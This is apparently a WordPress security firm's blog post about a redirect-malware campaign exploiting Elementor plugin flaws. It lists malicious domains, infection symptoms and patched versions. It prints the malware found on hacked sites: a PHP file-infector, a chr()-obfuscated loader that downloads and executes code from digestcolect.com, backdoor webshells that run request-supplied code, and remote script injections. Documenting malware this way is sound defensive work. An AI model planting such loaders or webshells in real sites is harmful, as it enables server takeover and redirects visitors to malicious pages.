Updated on
Attacks targeting vulnerabilities in WordPress themes and plugins have only gotten worse in recent months.
The already ongoing attack campaign on WordPress plugins – Elementor Pro, The Ultimate Addons of Elementor seems to have taken a new turn with redirect hack campaigns surfacing redirecting users to malicious digestcolect [.] com, and some more similar websites like –
js[.]donatelloflowfirstly.ga, track[.]developfirstline[.]com/t.js?s=5, deliverynotforme[.]best, 0.beerockstars[.]ga/?p=me3gmnbugm5gi3bpgq3tknq&sub2=mtrolley83, 0.directedmyfounds[.]ga/?p=gi3tazrwga5gi3bpgizdgmq&sub2=mstimens3, well.linetoadsactive[.]com/m.js?n=nb5, 0.realhelpcompany[.]ga, fast.helpmart[.]ga/m[.]js?w=085, dock.lovegreenpencils[.]ga/m.js?n=nb5, cht.secondaryinformtrand[.]com/m.js?n=nb5, main.travelfornamewalking[.]ga/, irc.lovegreenpencils[.]ga/, etc.
below-given sites.
We have found that Elementor and Ultimate Addons for Elementor have released updates to fix these security issues, so please update to the following versions if you haven’t already done it:
- Elementor Pro: 2.9.4
- Ultimate Addons for Elementor: 1.24.2
- Related hack – We have also seen WordPress websites redirect to tracking. developfirstline[.com]/t.js?s=5′ type=’text/javascript
What we know so far…
A common symptom shown by affected websites is redirection.
That said, there are also other symptoms that hint at the attack:
- Gibberish files added to the website root directory – Read more about gibberish keywords in wordpress site hack
- Unknown files in the website root such as wp-xmlrpc.phpwp-cl-plugin.php
- Thousands of unknown malicious javascript and PHP files were added to the file system.
- Unauthenticated admin users added to the WordPress admin area
- Unknown files and folders in /wp-content/uploads/elementor/custom-icons/
Also Read These Related Posts –
- EITest Redirection – Website Redirecting to Fake Tech Support Pages
- Malware Redirecting Websites To Outlook Pages & Phishing Sites
Malicious Javascript attempts to be stopped by a security firewall
What does the malicious website redirect code “tap.digestcolect.com/r.php?id=0 spam/” look like?
This code was found under a file named ‘hjghjerg‘: <?php $lastRunLog = "./debugs.log"; if (file_exists($lastRunLog)) { $lastRun = file_get_contents($lastRunLog); if (time() - $lastRun >= 6400) { search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index"); search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js"); file_put_contents($lastRunLog, time()); } } else { search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../","index"); search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js"); file_put_contents( './debugs.log', time()); } function search_file($dir,$file_to_search){ $files = @scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file( $dir,"index"); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file( $dir,"index"); return; } } ... function search_file_js($dir,$file_to_search){ $files = @scandir($dir); if($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file_js( $dir,".js"); return; } if($dir == $_SERVER['DOCUMENT_ROOT']."/") { @search_file_js( $dir,".js"); return; } } foreach($files as $key => $value){ $path = realpath($dir.DIRECTORY_SEPARATOR.$value); if(!is_dir($path)) { if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) { make_it_js($path); } }else if($value != "." && $value != "..") { search_file_js($path, $file_to_search); } } } function make_it_js($f){ $g = file_get_contents($f); if (strpos($g, 'var') !== false) { $g = file_get_contents($f); if (strpos($g, 'mndfhghjf') !== false) { } else { $l2 = ""; $g = file_get_contents($f); $g = $l2.$g; @system('chmod 777 '.$f); @file_put_contents($f,$g); $g = file_get_contents($f); if (strpos($g, 'mndfhghjf') !== false) { } } } } function make_it($f){ $g = file_get_contents($f); if (strpos($g, 'trackstatisticsss') !== false) { } else { $l2 = ""; $g = $l2.$g; @system('chmod 777 '.$f); @file_put_contents($f,$g); $g = file_get_contents($f); if (strpos($g, 'trackstatisticsss') !== false) { } } } This code was found in the header.php file: <?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(99).chr(115).chr(115).chr(46).chr(100).chr(105).chr(103).chr(101).chr(115).chr(116).chr(99).chr(111).chr(108).chr(101).chr(99).chr(116).chr(46).chr(99).chr(111).chr(109).chr(47).chr(109).chr(46).chr(116).chr(120).chr(116))); $c1 = chr(104); @file_put_contents($c1,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($c1);@unlink($c1); ?><?php if(isset($_REQUEST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_REQUEST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100). .. chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); $z3 = $b2($_REQUEST[chr(100).chr(49)]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } ?><?php if(isset($_GET[5]) && md5($_GET[5]) == "37147ec1ab66861d6e2ef8f672cb2c0b") {function _1896550334($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*","");return $a[$i];} function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];if(3404<mt_rand(443,2956))session_get_cookie_params($_COOKIE,$_0,$_POST,$_0);}$_1=l__0(_1896550334(0)) .l__0(_1896550334(1)) .l__0(_1896550334(2)) .l__0(_1896550334(3));if(!empty($_1)){$_1=str_rot13(@pack(_1896550334(4),strrev($_1)));if(isset($_1)){$_2=create_function(_1896550334(5),$_1);$_2();exit();}}else{echo base64_decode("bG9jYWwtZXJyb3Itbm90LWZvdW5k");}die();} ?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>?><script src='https://css.digestcolect.com/g.js?v=1.0.0' type='text/javascript'></script>
This code was found under some core theme files:
<script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script><script type='text/javascript' src='https://js.digestcolect.com/g.js?v=18'></script>
Know More About Malware Redirect
The target hackers’ WordPress sites on a regular basis. There are some commonly hacked WordPress files often targeted by attackers, but the scenario is somewhat different in the case of a hacked WordPress redirect.
Here attackers inject malicious codes into your site. Often, the administrator is unaware of this attack and only learns about it after users complain. These are the typical behaviors of a “ WordPress redirect hack”.
How do you confirm if your website has been infected with a redirection hack? In addition to complaints from your customers, here are some common symptoms:
- You receive complaints from your customers who are redirected to another spammy site.
- Your website is blacklisted by google. and may show messages like deceptive site ahead in google, or, This Site May Be Hacked
- Your homepage contains automatic push notifications that you haven’t added.
- The index.php and .htaccess files of your main WP installation contain unidentified and malicious JavaScript code.
- Your WordPress Hosting Server contains lots of junk files with suspicious filenames.
- You can find malicious code injections in the header.php and footer.php files of your installed theme files – which redirect your visitors to other domains like default7.com or test246.com.
- Diagnosing this malware is fairly easy, but fixing it is difficult. This is because hackers keep innovating to develop new, sneakier variants that affect different parts of your website in different ways, making them much harder to detect.
This malware also creates WP user accounts with administrator privileges, so it is essential to eliminate this malware from your website. We have an in-depth guide on How to remove malicious code from your wordpress site?
How does Redirect Hack Affect Your Website?
Although it may seem obvious, here are a few ways this hack can derail your business:
- A significant loss of traffic and engagement due to loss of traffic
- Damage to your hard-earned online reputation and brand trust – your redirected visitors will likely never return.
- SEO Spam can Impact your Google SEO Ranking – leading to more loss of inbound traffic
- Additional downtime – after being suspended by your host or blacklisted by the Google search engine.
- Blocked access to your WP Admin dashboard which could prevent you from taking quick action.
Dont worry, we got you covered. Check out our detailed article on fixing redirecting malware in wordpress site.
Detecting A Redirect malware on website
The heuristic test would involve visiting your site from multiple devices. Once the site or a page redirects you, it is probably a malware redirect. From there, file inspection should be performed to determine the root cause.
JS files
Usually, core files are modified with javascript to create redirects. Themes and plugins are the most vulnerable. In some cases, the entire set of rogue themes and plugins are downloaded.
In some cases, base64 encoding may be used, depending on the malware variant.
This particular script usually runs on the server from the domain that turns out to be malicious. Users are redirected using the code:
window.location.href=“hxxp://go.ad2up[.]com/afu.php?id=473791.
This code then displays spam advertisements to users. Therefore, it becomes crucial to detect which specific script initiates the malware redirect!
For more help, you can contact WP Hacked Help to fix Targeted Redirection Attacks to Digestcolect .com on WordPress Websites.
Conclusion – Websites Redirecting to Digestcolect .com
We hope this article helped you understand the redirect hack Linked To Vulnerabilities in Elementor Pro in a better way and provided you with the knowledge and tools to secure your website from hackers. This hack is one of the most ubiquitous and yet most damaging hacks.
Are there any other you have faced in your WordPress site? WP Hacked Help would love to help you. Let us know about it, as our team gets so many WordPress hack cleanup requests and we do it on a regular basis, 24/7 support is available.
